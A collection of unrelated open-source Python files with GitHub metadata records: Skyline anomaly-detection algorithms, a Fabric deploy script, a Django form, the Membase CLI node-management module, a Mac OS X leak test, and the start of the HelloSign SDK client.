stdDev = scipy.std(series)
mean = np.mean(series)
tail_average = tail_avg(timeseries)
z_score = (tail_average - mean) / stdDev
len_series = len(series)
threshold = scipy.stats.t.isf(.05 / (2 * len_series), len_series - 2)
threshold_squared = threshold * threshold
grubbs_score = ((len_series - 1) / np.sqrt(len_series)) * np.sqrt(threshold_squared / (len_series - 2 + threshold_squared))
return z_score > grubbs_score
def first_hour_average(timeseries):
"""
Calcuate the simple average over one hour, FULL_DURATION seconds ago.
A timeseries is anomalous if the average of the last three datapoints
are outside of three standard deviations of this value.
"""
last_hour_threshold = time() - (FULL_DURATION - 3600)
series = pandas.Series([x[1] for x in timeseries if x[0] < last_hour_threshold])
mean = (series).mean()
stdDev = (series).std()
t = tail_avg(timeseries)
return abs(t - mean) > 3 * stdDev
def stddev_from_average(timeseries):
"""
A timeseries is anomalous if the absolute value of the average of the latest
three datapoint minus the moving average is greater than one standard
deviation of the average. This does not exponentially weight the MA and so
is better for detecting anomalies with respect to the entire series.
"""
series = pandas.Series([x[1] for x in timeseries])
mean = series.mean()
stdDev = series.std()
t = tail_avg(timeseries)
return abs(t - mean) > 3 * stdDev
def stddev_from_moving_average(timeseries):
"""
A timeseries is anomalous if the absolute value of the average of the latest
three datapoint minus the moving average is greater than one standard
deviation of the moving average. This is better for finding anomalies with
respect to the short term trends.
"""
series = pandas.Series([x[1] for x in timeseries])
expAverage = pandas.stats.moments.ewma(series, com=50)
stdDev = pandas.stats.moments.ewmstd(series, com=50)
return abs(series.iget(-1) - expAverage.iget(-1)) > 3 * stdDev.iget(-1)
def mean_subtraction_cumulation(timeseries):
"""
A timeseries is anomalous if the value of the next datapoint in the
series is farther than a standard deviation out in cumulative terms
after subtracting the mean from each data point.
"""
series = pandas.Series([x[1] if x[1] else 0 for x in timeseries])
series = series - series[0:len(series) - 1].mean()
stdDev = series[0:len(series) - 1].std()
expAverage = pandas.stats.moments.ewma(series, com=15)
return abs(series.iget(-1)) > 3 * stdDev
def least_squares(timeseries):
"""
A timeseries is anomalous if the average of the last three datapoints
on a projected least squares model is greater than three sigma.
"""
x = np.array([t[0] for t in timeseries])
y = np.array([t[1] for t in timeseries])
A = np.vstack([x, np.ones(len(x))]).T
results = np.linalg.lstsq(A, y)
residual = results[1]
m, c = np.linalg.lstsq(A, y)[0]
errors = []
for i, value in enumerate(y):
projected = m * x[i] + c
error = value - projected
errors.append(error)
if len(errors) < 3:
return False
std_dev = scipy.std(errors)
t = (errors[-1] + errors[-2] + errors[-3]) / 3
return abs(t) > std_dev * 3 and round(std_dev) != 0 and round(t) != 0
def histogram_bins(timeseries):
"""
A timeseries is anomalous if the average of the last three datapoints falls
into a histogram bin with less than 20 other datapoints (you'll need to tweak
that number depending on your data)
Returns: the size of the bin which contains the tail_avg. Smaller bin size
means more anomalous.
"""
series = scipy.array([x[1] for x in timeseries])
t = tail_avg(timeseries)
h = np.histogram(series, bins=15)
bins = h[1]
for index, bin_size in enumerate(h[0]):
if bin_size <= 20:
# Is it in the first bin?
if index == 0:
if t <= bins[0]:
return True
# Is it in the current bin?
elif t >= bins[index] and t < bins[index + 1]:
return True
return False
def ks_test(timeseries):
"""
A timeseries is anomalous if 2 sample Kolmogorov-Smirnov test indicates
that data distribution for last 10 minutes is different from last hour.
It produces false positives on non-stationary series so Augmented
Dickey-Fuller test applied to check for stationarity.
"""
hour_ago = time() - 3600
ten_minutes_ago = time() - 600
reference = scipy.array([x[1] for x in timeseries if x[0] >= hour_ago and x[0] < ten_minutes_ago])
probe = scipy.array([x[1] for x in timeseries if x[0] >= ten_minutes_ago])
if reference.size < 20 or probe.size < 20:
return False
ks_d, ks_p_value = scipy.stats.ks_2samp(reference, probe)
if ks_p_value < 0.05 and ks_d > 0.5:
adf = sm.tsa.stattools.adfuller(reference, 10)
if adf[1] < 0.05:
return True
return False
def is_anomalously_anomalous(metric_name, ensemble, datapoint):
"""
This method runs a meta-analysis on the metric to determine whether the
metric has a past history of triggering. TODO: weight intervals based on datapoint
"""
# We want the datapoint to avoid triggering twice on the same data
new_trigger = [time(), datapoint]
# Get the old history
raw_trigger_history = redis_conn.get('trigger_history.' + metric_name)
if not raw_trigger_history:
redis_conn.set('trigger_history.' + metric_name, packb([(time(), datapoint)]))
return True
trigger_history = unpackb(raw_trigger_history)
# Are we (probably) triggering on the same data?
if (new_trigger[1] == trigger_history[-1][1] and
new_trigger[0] - trigger_history[-1][0] <= 300):
return False
# Update the history
trigger_history.append(new_trigger)
redis_conn.set('trigger_history.' + metric_name, packb(trigger_history))
# Should we surface the anomaly?
trigger_times = [x[0] for x in trigger_history]
intervals = [
trigger_times[i + 1] - trigger_times[i]
for i, v in enumerate(trigger_times)
if (i + 1) < len(trigger_times)
]
series = pandas.Series(intervals)
mean = series.mean()
stdDev = series.std()
return abs(intervals[-1] - mean) > 3 * stdDev
def run_selected_algorithm(timeseries, metric_name):
"""
Filter timeseries and run selected algorithm.
"""
# Get rid of short series
if len(timeseries) < MIN_TOLERABLE_LENGTH:
raise TooShort()
# Get rid of stale series
if time() - timeseries[-1][0] > STALE_PERIOD:
raise Stale()
# Get rid of boring series
if len(set(item[1] for item in timeseries[-MAX_TOLERABLE_BOREDOM:])) == BOREDOM_SET_SIZE:
raise Boring()
try:
ensemble = [globals()[algorithm](timeseries) for algorithm in ALGORITHMS]
threshold = len(ensemble) - CONSENSUS
if ensemble.count(False) <= threshold:
if ENABLE_SECOND_ORDER:
if is_anomalously_anomalous(metric_name, ensemble, timeseries[-1][1]):
return True, ensemble, timeseries[-1][1]
else:
return True, ensemble, timeseries[-1][1]
return False, ensemble, timeseries[-1][1]
except:
logging.error("Algorithm error: " + traceback.format_exc())
return False, [], 1
| {
"content_hash": "7f32df71c06c84c6aee7a28803908f17",
"timestamp": "",
"source": "github",
"line_count": 337,
"max_line_length": 127,
"avg_line_length": 31.49258160237389,
"alnum_prop": 0.6492980307170452,
"repo_name": "neo900/skyline",
"id": "f1c6d66e2e31c6179803737f234fab89cce406cd",
"size": "10613",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/analyzer/algorithms.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "4028"
},
{
"name": "D",
"bytes": "3607"
},
{
"name": "JavaScript",
"bytes": "183301"
},
{
"name": "Python",
"bytes": "65719"
},
{
"name": "Shell",
"bytes": "68"
}
],
"symlink_target": ""
} |
from fabric.api import *
env.hosts = ['base102.net']
env.user = 'adewinter'
def push_local():
local('git push origin master') # runs the command on the local environment
def pull_remote():
with cd('/opt/www/bitpay-shopify'):
run('whoami')
run('git pull origin master') # runs the command on the remote environment
def supervisor_cmd(cmd):
sudo('supervisorctl %s all' % cmd)
def supervisor_restart():
supervisor_cmd('restart')
def supervisor_start():
supervisor_cmd('start')
def supervisor_stop():
supervisor_cmd('stop')
def nginx_cmd(cmd):
sudo('/etc/init.d/nginx %s' % cmd)
def nginx_restart():
nginx_cmd('restart')
def nginx_stop():
nginx_cmd('stop')
def nginx_start():
nginx_cmd('start')
def deploy():
push_local()
pull_remote()
supervisor_restart()
nginx_restart()
| {
"content_hash": "3746357b3262ddf020f55a005cd98673",
"timestamp": "",
"source": "github",
"line_count": 53,
"max_line_length": 83,
"avg_line_length": 16.339622641509433,
"alnum_prop": 0.6397228637413395,
"repo_name": "adewinter/bitpay-shopify",
"id": "79606a5d7b4cc621d7272f25a4190d3495c087c0",
"size": "866",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "fabfile.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "5128"
},
{
"name": "Python",
"bytes": "25867"
}
],
"symlink_target": ""
} |
from django import forms
from django.utils.translation import ugettext_lazy as _
from student.apps.courses.tasks.models import Task
#Task form
class TaskForm(forms.Form):
text = forms.CharField(label=_("Text"), required=True)
explanation = forms.CharField(label=_("Explanation"), required=False)
note = forms.IntegerField(label=_("Note"), required=True)
task_type = forms.IntegerField(label=_("Task type"), required=True)
def clean(self):
# clean here
return self.cleaned_data
def create(self, request, user, chapter):
task = Task(
author = user,
chapter = chapter,
text = self.cleaned_data["text"],
explanation = self.cleaned_data["explanation"],
note = self.cleaned_data["note"],
task_type = self.cleaned_data["task_type"],
)
task.save()
return task
def update(self, request, task):
task.text = self.cleaned_data["text"]
task.explanation = self.cleaned_data["explanation"]
task.note = self.cleaned_data["note"]
task.task_type = self.cleaned_data["task_type"]
task.save()
return task
| {
"content_hash": "1fbd0c88c4f6ce70357bfa27237bd34b",
"timestamp": "",
"source": "github",
"line_count": 37,
"max_line_length": 73,
"avg_line_length": 34.13513513513514,
"alnum_prop": 0.5811559778305622,
"repo_name": "houssemFat/MeeM-Dev",
"id": "c526ace05115f453554cb3648ee19a312490038f",
"size": "1263",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "teacher/apps/courses/tasks/forms.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "54148"
},
{
"name": "HTML",
"bytes": "360877"
},
{
"name": "JavaScript",
"bytes": "1651985"
},
{
"name": "Nginx",
"bytes": "1597"
},
{
"name": "PHP",
"bytes": "3195"
},
{
"name": "Python",
"bytes": "374180"
},
{
"name": "Smarty",
"bytes": "7600"
}
],
"symlink_target": ""
} |
"""
Implementation for rebalance, add, remove, stop rebalance.
"""
import time
import os
import sys
import util_cli as util
import socket
from usage import usage
from restclient import *
from listservers import *
# the rest commands and associated URIs for various node operations
rest_cmds = {
'rebalance' :'/controller/rebalance',
'rebalance-stop' :'/controller/stopRebalance',
'rebalance-status' :'/pools/default/rebalanceProgress',
'server-add' :'/controller/addNode',
'server-readd' :'/controller/reAddNode',
'failover' :'/controller/failOver',
'cluster-init' :'/settings/web',
'node-init' :'/nodes/self/controller/settings',
}
server_no_remove = [
'rebalance-stop',
'rebalance-status',
'server-add',
'server-readd',
'failover'
]
server_no_add = [
'rebalance-stop',
'rebalance-status',
'failover',
]
# Map of operations and the HTTP methods used against the REST interface
methods = {
'rebalance' :'POST',
'rebalance-stop' :'POST',
'rebalance-status' :'GET',
'eject-server' :'POST',
'server-add' :'POST',
'server-readd' :'POST',
'failover' :'POST',
'cluster-init' :'POST',
'node-init' :'POST',
}
# Map of HTTP success code, success message and error message for
# handling HTTP response properly
class Node:
def __init__(self):
self.rest_cmd = rest_cmds['rebalance-status']
self.method = 'GET'
self.debug = False
self.server = ''
self.port = ''
self.user = ''
self.password = ''
self.params = {}
self.output = 'standard'
self.password_new = None
self.username_new = None
self.port_new = None
self.per_node_quota = None
self.data_path = None
def runCmd(self, cmd, server, port,
user, password, opts):
self.rest_cmd = rest_cmds[cmd]
self.method = methods[cmd]
self.server = server
self.port = int(port)
self.user = user
self.password = password
servers = self.processOpts(cmd, opts)
if self.debug:
print "INFO: servers %s" % servers
if cmd == 'server-add' and not servers['add']:
usage("please list one or more --server-add=HOST[:PORT];"
" or use -h for more help.")
if cmd == 'server-readd' and not servers['add']:
usage("please list one or more --server-add=HOST[:PORT];"
" or use -h for more help.")
if cmd in ('server-add', 'rebalance'):
self.addServers(servers['add'])
if cmd == 'rebalance':
self.rebalance(servers)
if cmd == 'server-readd':
self.reAddServers(servers)
if cmd == 'rebalance-status':
output_result = self.rebalanceStatus()
print output_result
if cmd == 'rebalance-stop':
output_result = self.rebalanceStop()
print output_result
if cmd == 'failover':
if len(servers['failover']) <= 0:
usage("please list one or more --server-failover=HOST[:PORT];"
" or use -h for more help.")
self.failover(servers)
if cmd == 'cluster-init':
self.clusterInit()
if cmd == 'node-init':
self.nodeInit()
def clusterInit(self):
rest = restclient.RestClient(self.server,
self.port,
{'debug':self.debug})
if self.port_new:
rest.setParam('port', self.port_new)
else:
rest.setParam('port', 'SAME')
rest.setParam('initStatus', 'done')
if self.username_new:
rest.setParam('username', self.username_new)
else:
rest.setParam('username', self.user)
if self.password_new:
rest.setParam('password', self.password_new)
else:
rest.setParam('password', self.password)
opts = {}
opts['error_msg'] = "unable to init %s" % self.server
opts['success_msg'] = "init %s" % self.server
output_result = rest.restCmd(self.method,
self.rest_cmd,
self.user,
self.password,
opts)
print output_result
# per node quota unfortunately runs against a different location
if not self.per_node_quota:
return
if self.port_new:
self.port = int(self.port_new)
if self.username_new:
self.user = self.username_new
if self.password_new:
self.password = self.password_new
rest = restclient.RestClient(self.server,
self.port,
{'debug':self.debug})
if self.per_node_quota:
rest.setParam('memoryQuota', self.per_node_quota)
output_result = rest.restCmd(self.method,
'/pools/default',
self.user,
self.password,
opts)
print output_result
def nodeInit(self):
rest = restclient.RestClient(self.server,
self.port,
{'debug':self.debug})
if self.data_path:
rest.setParam('path', self.data_path)
opts = {}
opts['error_msg'] = "unable to init %s" % self.server
opts['success_msg'] = "init %s" % self.server
output_result = rest.restCmd(self.method,
self.rest_cmd,
self.user,
self.password,
opts)
print output_result
def processOpts(self, cmd, opts):
""" Set standard opts.
note: use of a server key keeps optional
args aligned with server.
"""
servers = {
'add': {},
'remove': {},
'failover': {}
}
# don't allow options that don't correspond to given commands
for o, a in opts:
usage_msg = "option '%s' is not used with command '%s'" % (o, cmd)
if o in ( "-r", "--server-remove"):
if cmd in server_no_remove:
usage(usage_msg)
elif o in ( "-a", "--server-add",
"--server-add-username",
"--server-add-password"):
if cmd in server_no_add:
usage(usage_msg)
server = None
for o, a in opts:
if o in ("-a", "--server-add"):
if a == "self":
a = socket.gethostbyname(socket.getfqdn())
server = "%s:%d" % util.hostport(a)
servers['add'][server] = { 'user':'', 'password':''}
elif o == "--server-add-username":
if server is None:
usage("please specify --server-add"
" before --server-add-username")
servers['add'][server]['user'] = a
elif o == "--server-add-password":
if server is None:
usage("please specify --server-add"
" before --server-add-password")
servers['add'][server]['password'] = a
elif o in ( "-r", "--server-remove"):
server = "%s:%d" % util.hostport(a)
servers['remove'][server] = True
server = None
elif o in ( "--server-failover"):
server = "%s:%d" % util.hostport(a)
servers['failover'][server] = True
server = None
elif o in ('-o', '--output'):
if a == 'json':
self.output = a
server = None
elif o in ('-d', '--debug'):
self.debug = True
server = None
elif o == '--cluster-init-password':
self.password_new = a
elif o == '--cluster-init-username':
self.username_new = a
elif o == '--cluster-init-port':
self.port_new = a
elif o == '--cluster-init-ramsize':
self.per_node_quota = a
elif o == '--node-init-data-path':
self.data_path = a
return servers
def addServers(self, servers):
for server in servers:
user = servers[server]['user']
password = servers[server]['password']
output_result = self.serverAdd(server,
user,
password)
print output_result
def serverAdd(self, add_server, add_with_user, add_with_password):
rest = restclient.RestClient(self.server,
self.port,
{'debug':self.debug})
rest.setParam('hostname', add_server)
if add_with_user and add_with_password:
rest.setParam('user', add_with_user)
rest.setParam('password', add_with_password)
opts = {}
opts['error_msg'] = "unable to server-add %s" % add_server
opts['success_msg'] = "server-add %s" % add_server
output_result = rest.restCmd('POST',
rest_cmds['server-add'],
self.user,
self.password,
opts)
return output_result
def reAddServers(self, servers):
known_otps, eject_otps, failover_otps, readd_otps = \
self.getNodeOtps(to_readd=servers['add'])
for readd_otp in readd_otps:
rest = restclient.RestClient(self.server,
self.port,
{'debug':self.debug})
rest.setParam('otpNode', readd_otp)
opts = {}
opts['error_msg'] = "unable to re-add %s" % readd_otp
opts['success_msg'] = "re-add %s" % readd_otp
output_result = rest.restCmd('POST',
rest_cmds['server-readd'],
self.user,
self.password,
opts)
print output_result
def getNodeOtps(self, to_eject=[], to_failover=[], to_readd=[]):
""" Convert known nodes into otp node id's.
"""
listservers = ListServers()
known_nodes_list = listservers.getNodes(
listservers.getData(self.server,
self.port,
self.user,
self.password))
known_otps = []
eject_otps = []
failover_otps = []
readd_otps = []
for node in known_nodes_list:
if node.get('otpNode') is None:
raise Exception("could not access node;" +
" please check your username (-u) and password (-p)")
known_otps.append(node['otpNode'])
if node['hostname'] in to_eject:
eject_otps.append(node['otpNode'])
if node['hostname'] in to_failover:
if node['clusterMembership'] != 'active':
raise Exception('node %s is not active' % node['hostname'])
else:
failover_otps.append(node['otpNode'])
if node['hostname'] in to_readd:
readd_otps.append(node['otpNode'])
return (known_otps, eject_otps, failover_otps, readd_otps)
def rebalance(self, servers):
known_otps, eject_otps, failover_otps, readd_otps = \
self.getNodeOtps(to_eject=servers['remove'])
rest = restclient.RestClient(self.server,
self.port,
{'debug':self.debug})
rest.setParam('knownNodes', ','.join(known_otps))
rest.setParam('ejectedNodes', ','.join(eject_otps))
opts = {}
opts['success_msg'] = 'rebalanced cluster'
opts['error_msg'] = 'unable to rebalance cluster'
output_result = rest.restCmd('POST',
rest_cmds['rebalance'],
self.user,
self.password,
opts)
if self.debug:
print "INFO: rebalance started: %s" % output_result
sys.stdout = os.fdopen(sys.stdout.fileno(), 'w', 0)
print "INFO: rebalancing",
status, error = self.rebalanceStatus(prefix='\n')
while status == 'running':
print ".",
time.sleep(0.5)
try:
status, error = self.rebalanceStatus(prefix='\n')
except socket.error:
time.sleep(2)
status, error = self.rebalanceStatus(prefix='\n')
if error:
print '\n' + error
sys.exit(1)
else:
print '\n' + output_result
def rebalanceStatus(self, prefix=''):
rest = restclient.RestClient(self.server,
self.port,
{'debug':self.debug})
opts = { 'error_msg':'unable to obtain rebalance status'}
output_result = rest.restCmd('GET',
rest_cmds['rebalance-status'],
self.user,
self.password,
opts)
json = rest.getJson(output_result)
if type(json) == type(list()):
print prefix + ("ERROR: %s" % json[0])
sys.exit(1)
if 'errorMessage' in json:
error_message = json['errorMessage']
else:
error_message = None
return json['status'],error_message
def rebalanceStop(self):
rest = restclient.RestClient(self.server,
self.port,
{'debug':self.debug})
opts = {}
opts['success_msg'] = 'rebalance cluster stopped'
opts['error_msg'] = 'unable to stop rebalance'
output_result = rest.restCmd('POST',
rest_cmds['rebalance-stop'],
self.user,
self.password,
opts)
return output_result
def failover(self, servers):
known_otps, eject_otps, failover_otps, readd_otps = \
self.getNodeOtps(to_failover=servers['failover'])
if len(failover_otps) <= 0:
usage("specified servers are not part of the cluster: %s" %
servers['failover'].keys())
for failover_otp in failover_otps:
rest = restclient.RestClient(self.server,
self.port,
{'debug':self.debug})
rest.setParam('otpNode', failover_otp)
opts = {}
opts['error_msg'] = "unable to failover %s" % failover_otp
opts['success_msg'] = "failover %s" % failover_otp
output_result = rest.restCmd('POST',
rest_cmds['failover'],
self.user,
self.password,
opts)
print output_result
| {
"content_hash": "9b1ad58a1e966193aa73c6acff25ff51",
"timestamp": "",
"source": "github",
"line_count": 460,
"max_line_length": 85,
"avg_line_length": 35.14782608695652,
"alnum_prop": 0.4631370608609599,
"repo_name": "membase/membase-cli",
"id": "1e9800cb74bf4ba6d12b0cf90f4f7947dc6977a6",
"size": "16168",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "node.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Perl",
"bytes": "1254"
},
{
"name": "Python",
"bytes": "444592"
},
{
"name": "Shell",
"bytes": "1778"
}
],
"symlink_target": ""
} |
import sys
if sys.platform != 'darwin':
raise ValueError, "This test only leaks on Mac OS X"
def leak():
# taken from platform._mac_ver_lookup()
from gestalt import gestalt
import MacOS
try:
gestalt('sysu')
except MacOS.Error:
pass
| {
"content_hash": "9829ef75ddf5de16197a2a3d5cb45148",
"timestamp": "",
"source": "github",
"line_count": 14,
"max_line_length": 56,
"avg_line_length": 20.642857142857142,
"alnum_prop": 0.5986159169550173,
"repo_name": "babyliynfg/cross",
"id": "ac6522bcf21a34d3080e6ef18f3a1f0394603e37",
"size": "289",
"binary": false,
"copies": "16",
"ref": "refs/heads/master",
"path": "tools/project-creator/Python2.6.6/Lib/test/leakers/test_gestalt.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "36722"
},
{
"name": "C",
"bytes": "6345646"
},
{
"name": "C++",
"bytes": "15980000"
},
{
"name": "CMake",
"bytes": "1238"
},
{
"name": "GLSL",
"bytes": "64406"
},
{
"name": "HTML",
"bytes": "147661"
},
{
"name": "Java",
"bytes": "574078"
},
{
"name": "JavaScript",
"bytes": "503327"
},
{
"name": "Makefile",
"bytes": "18778"
},
{
"name": "Objective-C",
"bytes": "396703"
},
{
"name": "Objective-C++",
"bytes": "378740"
},
{
"name": "PLSQL",
"bytes": "22886"
},
{
"name": "Python",
"bytes": "15265548"
},
{
"name": "Roff",
"bytes": "23"
},
{
"name": "Shell",
"bytes": "61021"
},
{
"name": "Visual Basic",
"bytes": "19200"
}
],
"symlink_target": ""
} |
from hellosign_sdk.utils import HSRequest, HSException, NoAuthMethod, HSAccessTokenAuth, HSFormat, api_resource, api_resource_list
from hellosign_sdk.resource import Account, ApiApp, SignatureRequest, Template, Team, Embedded, UnclaimedDraft
from requests.auth import HTTPBasicAuth
import json
#
# The MIT License (MIT)
#
# Copyright (C) 2014 hellosign.com
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
class HSClient(object):
''' Client object to interact with the API urls
Most of the operations of the SDK is made through this object. Please refer
to the README.rst file for more details on how to use the client object.
'''
version = '4.0.0' # SDK version
API_VERSION = 'v3' # API version
API_URL = ''
ACCOUNT_CREATE_URL = ''
ACCOUNT_INFO_URL = ''
ACCOUNT_UPDATE_URL = ''
ACCOUNT_VERIFY_URL = ''
SIGNATURE_REQUEST_INFO_URL = ''
SIGNATURE_REQUEST_LIST_URL = ''
SIGNATURE_REQUEST_DOWNLOAD_PDF_URL = ''
SIGNATURE_REQUEST_CREATE_URL = ''
SIGNATURE_REQUEST_CREATE_WITH_TEMPLATE_URL = ''
SIGNATURE_REQUEST_REMIND_URL = ''
SIGNATURE_REQUEST_CANCEL_URL = ''
SIGNATURE_REQUEST_CREATE_EMBEDDED_URL = ''
SIGNATURE_REQUEST_CREATE_EMBEDDED_WITH_TEMPLATE_URL = ''
EMBEDDED_OBJECT_GET_URL = ''
EMBEDDED_TEMPLATE_EDIT_URL = ''
UNCLAIMED_DRAFT_CREATE_URL = ''
UNCLAIMED_DRAFT_CREATE_EMBEDDED_URL = ''
UNCLAIMED_DRAFT_CREATE_EMBEDDED_WITH_TEMPLATE_URL = ''
UNCLAIMED_DRAFT_EDIT_AND_RESEND_URL = ''
TEMPLATE_GET_URL = ''
TEMPLATE_GET_LIST_URL = ''
TEMPLATE_GET_FILES_URL = ''
TEMPLATE_DELETE_URL = ''
TEMPLATE_ADD_USER_URL = ''
TEMPLATE_REMOVE_USER_URL = ''
TEMPLATE_CREATE_EMBEDDED_DRAFT_URL = ''
TEAM_INFO_URL = ''
TEAM_UPDATE_URL = ''
TEAM_CREATE_URL = ''
TEAM_DESTROY_URL = ''
TEAM_ADD_MEMBER_URL = ''
TEAM_REMOVE_MEMBER_URL = ''
API_APP_INFO_URL = ''
API_APP_LIST_URL = ''
API_APP_CREATE_URL = ''
API_APP_UPDATE_URL = ''
API_APP_DELETE_URL = ''
OAUTH_TOKEN_URL = ''
request = None
response_callback = None
def __init__(self, email_address=None, password=None, api_key=None, access_token=None, access_token_type='Bearer', env='production'):
'''Initialize the client object with authentication information to send requests
Args:
email_address (str): E-mail of the account to make the requests
password (str): Password of the account used with email address
api_key (str): API Key. You can find your API key in https://app.hellosign.com/home/myAccount/current_tab/integrations#api
access_token (str): OAuth access token to use
access_token_type (str): Type of OAuth token (defaults to Bearer, which is the only value supported for now)
'''
super(HSClient, self).__init__()
self.auth = self._authenticate(email_address, password, api_key, access_token, access_token_type)
self.account = Account()
self.env = env
self._init_endpoints()
def __str__(self):
''' Return a string description of this object '''
return "HelloSign Client %s" % self.version
def _init_endpoints(self):
API_PRODUCTION_URL = "https://api.hellosign.com"
API_DEV_URL = "https://api.dev-hellosign.com"
API_STAGING_URL = "https://api.staging-hellosign.com"
WEB_PRODUCTION_URL = "https://app.hellosign.com"
WEB_DEV_URL = "https://app.dev-hellosign.com"
WEB_STAGING_URL = "https://app.staging-hellosign.com"
if self.env == "production":
self.API_URL = API_PRODUCTION_URL + '/' + self.API_VERSION
self.OAUTH_TOKEN_URL = WEB_PRODUCTION_URL + '/oauth/token'
elif self.env == "dev":
self.API_URL = API_DEV_URL + '/' + self.API_VERSION
self.OAUTH_TOKEN_URL = WEB_DEV_URL + '/oauth/token'
print("WARNING: Using dev api endpoint %s" % self.API_URL)
elif self.env == "staging":
self.API_URL = API_STAGING_URL + '/' + self.API_VERSION
self.OAUTH_TOKEN_URL = WEB_STAGING_URL + '/oauth/token'
print("WARNING: Using staging api endpoint %s" % self.API_URL)
self.ACCOUNT_CREATE_URL = self.API_URL + '/account/create'
self.ACCOUNT_INFO_URL = self.API_URL + '/account'
self.ACCOUNT_UPDATE_URL = self.API_URL + '/account'
self.ACCOUNT_VERIFY_URL = self.API_URL + '/account/verify'
self.SIGNATURE_REQUEST_INFO_URL = self.API_URL + '/signature_request/'
self.SIGNATURE_REQUEST_LIST_URL = self.API_URL + '/signature_request/list'
self.SIGNATURE_REQUEST_DOWNLOAD_PDF_URL = self.API_URL + '/signature_request/files/'
self.SIGNATURE_REQUEST_CREATE_URL = self.API_URL + '/signature_request/send'
self.SIGNATURE_REQUEST_CREATE_WITH_TEMPLATE_URL = self.API_URL + '/signature_request/send_with_template'
self.SIGNATURE_REQUEST_REMIND_URL = self.API_URL + '/signature_request/remind/'
self.SIGNATURE_REQUEST_UPDATE_URL = self.API_URL + '/signature_request/update/'
self.SIGNATURE_REQUEST_CANCEL_URL = self.API_URL + '/signature_request/cancel/'
self.SIGNATURE_REQUEST_REMOVE_ACCESS_URL = self.API_URL + '/signature_request/remove/'
self.SIGNATURE_REQUEST_CREATE_EMBEDDED_URL = self.API_URL + '/signature_request/create_embedded'
self.SIGNATURE_REQUEST_CREATE_EMBEDDED_WITH_TEMPLATE_URL = self.API_URL + '/signature_request/create_embedded_with_template'
self.EMBEDDED_OBJECT_GET_URL = self.API_URL + '/embedded/sign_url/'
self.EMBEDDED_TEMPLATE_EDIT_URL = self.API_URL + '/embedded/edit_url/'
self.UNCLAIMED_DRAFT_CREATE_URL = self.API_URL + '/unclaimed_draft/create'
self.UNCLAIMED_DRAFT_CREATE_EMBEDDED_URL = self.API_URL + '/unclaimed_draft/create_embedded'
self.UNCLAIMED_DRAFT_CREATE_EMBEDDED_WITH_TEMPLATE_URL = self.API_URL + '/unclaimed_draft/create_embedded_with_template'
self.UNCLAIMED_DRAFT_EDIT_AND_RESEND_URL = self.API_URL + '/unclaimed_draft/edit_and_resend/'
self.TEMPLATE_GET_URL = self.API_URL + '/template/'
self.TEMPLATE_GET_LIST_URL = self.API_URL + '/template/list'
self.TEMPLATE_GET_FILES_URL = self.API_URL + '/template/files/'
self.TEMPLATE_DELETE_URL = self.API_URL + '/template/delete/'
self.TEMPLATE_ADD_USER_URL = self.API_URL + '/template/add_user/'
self.TEMPLATE_REMOVE_USER_URL = self.API_URL + '/template/remove_user/'
self.TEMPLATE_CREATE_EMBEDDED_DRAFT_URL = self.API_URL + '/template/create_embedded_draft'
self.TEMPLATE_UPDATE_FILES_URL = self.API_URL + '/template/update_files/'
self.TEAM_INFO_URL = self.API_URL + '/team'
self.TEAM_UPDATE_URL = self.TEAM_INFO_URL
self.TEAM_CREATE_URL = self.API_URL + '/team/create'
self.TEAM_DESTROY_URL = self.API_URL + '/team/destroy'
self.TEAM_ADD_MEMBER_URL = self.API_URL + '/team/add_member'
self.TEAM_REMOVE_MEMBER_URL = self.API_URL + '/team/remove_member'
self.API_APP_INFO_URL = self.API_URL + '/api_app/'
self.API_APP_LIST_URL = self.API_URL + '/api_app/list'
self.API_APP_CREATE_URL = self.API_URL + '/api_app'
self.API_APP_UPDATE_URL = self.API_APP_INFO_URL
self.API_APP_DELETE_URL = self.API_APP_INFO_URL
# ---- ACCOUNT METHODS -----------------------------
@api_resource(Account)
def create_account(self, email_address, password=None, client_id=None, client_secret=None):
''' Create a new account.
If the account is created via an app, then Account.oauth will contain the
OAuth data that can be used to execute actions on behalf of the newly created account.
Args:
email_address (str): Email address of the new account to create
password (str): [DEPRECATED] This parameter will be ignored
client_id (str, optional): Client id of the app to use to create this account
client_secret (str, optional): Secret of the app to use to create this account
Returns:
The new Account object
'''
request = self._get_request()
params = {
'email_address': email_address
}
if client_id:
params['client_id'] = client_id
params['client_secret'] = client_secret
response = request.post(self.ACCOUNT_CREATE_URL, params)
if 'oauth_data' in response:
response["account"]["oauth"] = response['oauth_data']
return response
# Get account info and put in self.account so that further access to the
# info can be made by using self.account.attribute
def get_account_info(self):
''' Get current account information
The information then will be saved in `self.account` so that you can
access the information like this:
>>> hsclient = HSClient()
>>> acct = hsclient.get_account_info()
>>> print acct.email_address
Returns:
An Account object
'''
request = self._get_request()
response = request.get(self.ACCOUNT_INFO_URL)
self.account.json_data = response["account"]
return self.account
# At the moment you can only update your callback_url only
@api_resource(Account)
def update_account_info(self):
''' Update current account information
At the moment you can only update your callback_url.
Returns:
An Account object
'''
request = self._get_request()
